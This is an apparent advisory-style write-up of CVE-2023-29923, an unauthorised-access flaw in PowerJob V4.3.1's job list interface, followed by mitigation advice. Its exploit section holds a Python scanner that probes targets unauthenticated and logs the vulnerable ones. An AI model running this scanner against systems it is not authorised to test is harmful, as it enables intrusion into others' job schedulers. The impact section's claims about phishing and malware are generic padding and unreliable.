Description
The CVE-2023-29923 vulnerability is a security flaw in PowerJob V4.3.1 that allows unauthorized access to assets via the list job interface. This vulnerability is caused by insecure permissions, which can be exploited by attackers to gain access to sensitive information.
Impact
This vulnerability can have a significant impact on the average internet user, as it can allow attackers to access sensitive information without authorization. This can include personal data, financial information, and other confidential information. The vulnerability can also be used to launch further attacks, such as phishing attacks or malware infections.
Exploit
To exploit this vulnerability, attackers can use a Python script that sends a request to a specified URL and checks for the existence of the vulnerability. The script uses the list job interface to gain unauthorized access to assets and save the results in a result.txt file. Here is a code snippet from the script:
def send_req(url_check):
url = url_check + '/job/list'
header = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
'Content-Type':'application/json;charset=UTF-8',
'Accept-Encoding':'gzip, deflate',
'Accept-Language':'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
}
data = {
"appId":1,
"index":0,
"pageSize":10
}
try:
requests.packages.urllib3.disable_warnings()
response = requests.post(url=url,headers=header,json=data,verify=False,timeout=3).json()
if response['success']:
write_result(url_check)
time.sleep(1)
except Exception as e:
pass
The script uses the requests module to send a POST request to the list job interface with a JSON payload. If the response indicates that the vulnerability exists, the script writes the URL to a result.txt file.
Mitigation
To protect against this vulnerability, users should update to the latest version of PowerJob and ensure that all security patches are applied. Users should also ensure that their systems are properly configured and that access controls are in place to prevent unauthorized access. Additionally, users should be cautious when opening emails or clicking on links from unknown sources, as these can be used to launch phishing attacks or malware infections.